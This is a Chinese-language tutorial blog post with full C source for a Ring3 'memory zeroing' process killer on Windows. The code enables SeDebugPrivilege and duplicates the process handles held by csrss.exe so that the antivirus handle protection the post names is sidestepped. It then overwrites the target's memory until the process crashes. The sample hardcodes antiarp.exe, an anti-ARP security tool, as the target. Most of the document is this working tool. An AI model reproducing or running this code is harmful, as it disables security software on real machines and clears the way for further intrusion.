RING3下 内存清零法 杀进程

在一般任务管理器无法关闭进程时用到

内存清零法 杀进程 原理分析

1.先打开CSRSS.EXE系统进程，获得其句柄，几乎系统所有的HANDLE结构体中,里面的ProcessId都是指向csrss.exe的，利用它的PID来进行遍历进程实现过滤。

2.分配好一块内存空间Buffer，用来存储SystemHandleInformation系统句柄信息

3.通过ZwQuerySystemInformation函数来查询系统句柄信息并保存在Buffer中，为 ZwQuerySystemInformation 函数传递16号参数，且Buffer的开始出保存的是系统句柄的数量.偏移4才是句柄信息

4.遍历Buffer中PSYSTEM_HANDLE_TABLE_ENTRY_INFO结构
typedef struct _SYSTEM_HANDLE_INFORMATION {
    ULONG NumberOfHandles;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[ 1 ];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

0xxxxxxx ULONG NumberOfHandles
...       PSYSTEM_HANDLE_TABLE_ENTRY_INFO
...       PSYSTEM_HANDLE_TABLE_ENTRY_INFO
..        PSYSTEM_HANDLE_TABLE_ENTRY_INFO
.          .
.          .
.          .

5.几乎系统所有的HANDLE结构体中,里面的ProcessId都是指向csrss.exe的,
h_info[i].UniqueProcessId== (ULONG)csrss_id) && (h_info[i].ObjectTypeIndex== 5
利用这个特性 来进行过滤句柄，遍历每个进程

6.有些时候，进程句柄是打不开的，通过遍历进程，可以得到句柄值，在知晓句柄值后，就可以进行句柄复制了
ZwDuplicateObject(
     ph,
     (PHANDLE)h_info[i].HandleValue,
     (HANDLE)-1,
     &h_dup,//复制后得到的句柄
     0,
     0,
     DUPLICATE_SAME_ACCESS)
复制后的句柄，就可以随便操作了

7.使用ZwQueryInformationProcess函数来查询改句柄的PID,用来遍历到要操作的目标进程

8.其实可以用更简单的方式打开进程的，1-7步的目的就是一种非常规打开进程的方式，目的就是防止杀毒防护软件等对句柄的保护. 如果找到并打开了目标进程，就可以操作该进程内存，往该进程空间写入垃圾数据，让程序自己崩溃。
if (pbi.UniqueProcessId == dwProcessId)
    {
     MessageBox(0, "目标已确定!", "!", MB_OK);

     for (i = 0x1000; i < 0x80000000; i = i + 0x1000)
     {
      PVOID pAddress = (PVOID) i;
      ULONG sz = 0x1000;
      ULONG oldp;

      if (ZwProtectVirtualMemory (h_dup, &pAddress, &sz, PAGE_EXECUTE_READWRITE, &oldp) == STATUS_SUCCESS) {             
       ZwWriteVirtualMemory(h_dup, pAddress, buf, 0x1000, &oldp);
      }         
     }

 

源代码也可以自己百度下..

 

 

================================================================

 

 

RKU的这招确实不错。在DebugMan上看到一点关于内存清零的提示信息，准备在RING0下实践下，结果BSOD的受不了，调试驱动偶还木有入门啊。无赖之下看到了RING3下实现的code，于是学习之。

/*************************************************************************
* 学习者: sudami
* 时间:    07/12/24
*
* 备注:    学习RING3下通过内存清零结束大部分进程的方法.思路如下：
*
* 遍历所有进程[隐藏进程暂时不在考虑之内]获得csrss.exe的PID,ZwOpenProcess得到其句柄-->
* 为ZwQuerySystemInformation 函数传递16号参数.获得系统句柄信息 -->
* 几乎系统所有的HANDLE结构体中,里面的ProcessId都是指向csrss.exe的,遍历每个进程-->
* 调用ZwDuplicateObject复制此进程的句柄表,ZwQueryInformationProcess得到
* PROCESS_BASIC_INFORMATION结构信息; 判断其中的UniqueProcessId是否和指定的PID相同-->
* 若相同,则相指定进程中写入垃圾数据,使进程死掉; 若不同,继续遍历.
*
*************************************************************************/

#include <windows.h>
#include <Ntsecapi.h>
#include <Aclapi.h>
#include <tlhelp32.h>
#include "G:/sudamiDriver/RootKit.h"

//////////////////////////////////////////////////////////////////////////

#pragma comment (lib,"ntdll.lib") 
#pragma comment (lib, "Kernel32.lib")
#pragma comment (lib, "Advapi32.lib")
#pragma comment (linker, "/subsystem:windows")
#pragma comment (linker, "/ENTRY:main")

//------------------------------------------------------------------

DWORD   GetPidByName (char *szName);
void    KillProcess (ULONG dwProcessId);
BOOL    EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable);

 

//////////////////////////////////////////////////////////////////////////
// 主函数入口
//
void main()
{    
ULONG   Pid;
HANDLE hToken;

OpenProcessToken (GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);
EnablePrivilege (hToken, SE_DEBUG_NAME, TRUE);

if (Pid = GetPidByName("antiarp.exe")) {
   KillProcess (Pid);
} else {
   MessageBox (NULL, TEXT("The process is not exit,please check out."), TEXT("!"), MB_OK);
}
}

/////////////////////////////////////////////////////////////////////////
//-----------------------------------------------------------------------
// 函数名: GetPidByName
// 
// 参数:   char *szName
//         --> 进程名
//
// 返回值: 指定进程的PID
//
// 功能:   通过CreateToolhelp32Snapshot函数遍历进程,找到制定进程的PID
//         对RootKit基本无用
//
DWORD GetPidByName (char *szName)
{
HANDLE hProcessSnap = INVALID_HANDLE_VALUE;
PROCESSENTRY32 pe32 = {0};
DWORD dwRet=0;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE)
   return 0;

pe32.dwSize = sizeof(PROCESSENTRY32);

if (Process32First (hProcessSnap, &pe32)) {
   do {
    if (lstrcmpi(szName, pe32.szExeFile) == 0) {
     dwRet=pe32.th32ProcessID;
     break;
    }
   }while (Process32Next(hProcessSnap,&pe32));
}
else {
   return 0;
}

if(hProcessSnap !=INVALID_HANDLE_VALUE) {
   CloseHandle(hProcessSnap);
}

return dwRet;
}


/////////////////////////////////////////////////////////////////////////
//-----------------------------------------------------------------------
// 函数名: KillProcess
// 
// 参数:   ULONG dwProcessId
//         --> 进程ID
//
// 返回值: NULL
//
// 功能:   向指定的进程空间填充垃圾信息.使进程死掉
//         
void KillProcess (ULONG dwProcessId)
{
HMODULE hNTDLL   =   GetModuleHandle("ntdll.dll");
HANDLE     ph, h_dup; 

PSYSTEM_HANDLE_INFORMATION     h_info; 
PROCESS_BASIC_INFORMATION      pbi;

// 得到 csrss.exe 进程的PID
HANDLE     csrss_id    = (HANDLE) GetPidByName ("csrss.exe");
CLIENT_ID client_id;
client_id.UniqueProcess   = csrss_id;
client_id.UniqueThread    = 0;

// 初始化对象结构体
OBJECT_ATTRIBUTES               attr;
attr.Length                     = sizeof(OBJECT_ATTRIBUTES);
attr.RootDirectory     = 0;
attr.ObjectName      = 0;
attr.Attributes      = 0;
attr.SecurityDescriptor    = 0;
attr.SecurityQualityOfService   = 0;


////////////////////////////////////////////////////////////////////////////////////
// 获得这些函数的实际地址

ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = 
   (ZWQUERYSYSTEMINFORMATION) GetProcAddress (hNTDLL, "ZwQuerySystemInformation");

ZWOPENPROCESS ZwOpenProcess = 
   (ZWOPENPROCESS) GetProcAddress (hNTDLL, "ZwOpenProcess");

ZWDUPLICATEOBJECT ZwDuplicateObject =
   (ZWDUPLICATEOBJECT) GetProcAddress (hNTDLL, "ZwDuplicateObject");

ZWQUERYINFORMATIONPROCESS ZwQueryInformationProcess = 
   (ZWQUERYINFORMATIONPROCESS) GetProcAddress (hNTDLL, "ZwQueryInformationProcess");

   ZWALLOCATEVIRTUALMEMORY   ZwAllocateVirtualMemory =
   (ZWALLOCATEVIRTUALMEMORY) GetProcAddress (hNTDLL, "ZwAllocateVirtualMemory");

ZWPROTECTVIRTUALMEMORY ZwProtectVirtualMemory = 
   (ZWPROTECTVIRTUALMEMORY) GetProcAddress (hNTDLL, "ZwProtectVirtualMemory");

ZWWRITEVIRTUALMEMORY ZwWriteVirtualMemory = 
   (ZWWRITEVIRTUALMEMORY) GetProcAddress (hNTDLL, "ZwWriteVirtualMemory");

ZWFREEVIRTUALMEMORY   ZwFreeVirtualMemory = 
   (ZWFREEVIRTUALMEMORY) GetProcAddress (GetModuleHandle("ntdll.dll"),   "ZwFreeVirtualMemory");

ZWCLOSE   ZwClose = 
   (ZWCLOSE) GetProcAddress (hNTDLL, "ZwClose");

////////////////////////////////////////////////////////////////////////////////////


// 打开CSRSS.EXE，获得其句柄
ZwOpenProcess (&ph, PROCESS_ALL_ACCESS, &attr, &client_id);

ULONG   bytesIO = 0x400000;
PVOID buf     = 0;

ZwAllocateVirtualMemory (GetCurrentProcess(), &buf, 0, &bytesIO, MEM_COMMIT, PAGE_READWRITE);

// 为 ZwQuerySystemInformation 函数传递16号参数.获得系统句柄信息保存在buff中
// buff的开始出保存的是系统句柄的数量.偏移4才是句柄信息
ZwQuerySystemInformation (SystemHandleInformation, buf, 0x400000, &bytesIO);
ULONG NumOfHandle = (ULONG) buf;
h_info = (PSYSTEM_HANDLE_INFORMATION)((ULONG)buf+4);

for (ULONG i= 0 ; i<NumOfHandle; i++, h_info++)
{ 
   if ((h_info->ProcessId == (ULONG)csrss_id) && (h_info->ObjectTypeNumber == 5))
   {
   // 复制句柄
    if (ZwDuplicateObject(
     ph,
     (PHANDLE)h_info->Handle,
     (HANDLE)-1,
     &h_dup,
     0,
     0, 
     DUPLICATE_SAME_ACCESS) == STATUS_SUCCESS) {

      ZwQueryInformationProcess(h_dup, 0, &pbi, sizeof(pbi), &bytesIO);
    }


    if (pbi.UniqueProcessId == dwProcessId)
    {
     MessageBox(0, "目标已确定!", "!", MB_OK);

     for (i = 0x1000; i < 0x80000000; i = i + 0x1000)
     {
      PVOID pAddress = (PVOID) i;
      ULONG sz = 0x1000;
      ULONG oldp;

      if (ZwProtectVirtualMemory (h_dup, &pAddress, &sz, PAGE_EXECUTE_READWRITE, &oldp) == STATUS_SUCCESS) {              
       ZwWriteVirtualMemory(h_dup, pAddress, buf, 0x1000, &oldp);
      }          
     }

     MessageBox(0, "任务已完成！","!", 0);
   //   ZwClose(h_dup);     
     break;
    }
   }
}

bytesIO = 0;
ZwFreeVirtualMemory(GetCurrentProcess(), &buf, &bytesIO, MEM_RELEASE);
}


/////////////////////////////////////////////////////////////////////////
//-----------------------------------------------------------------------
// 函数名: EnablePrivilege
// 
// 参数:   HANDLE   hToken     ---> 进程句柄
//         LPCTSTR szPrivName ---> 
//         BOOL     fEnable    --->
//
// 返回值: TRUE | FALSE
//
// 功能:   提升当前进程到指定的特权级
//         
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable)
{
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;

LookupPrivilegeValue (NULL, szPrivName, &tp.Privileges[0]. Luid);

tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0;

AdjustTokenPrivileges (hToken, FALSE, &tp, sizeof(tp), NULL, NULL);

return((GetLastError() == ERROR_SUCCESS));
}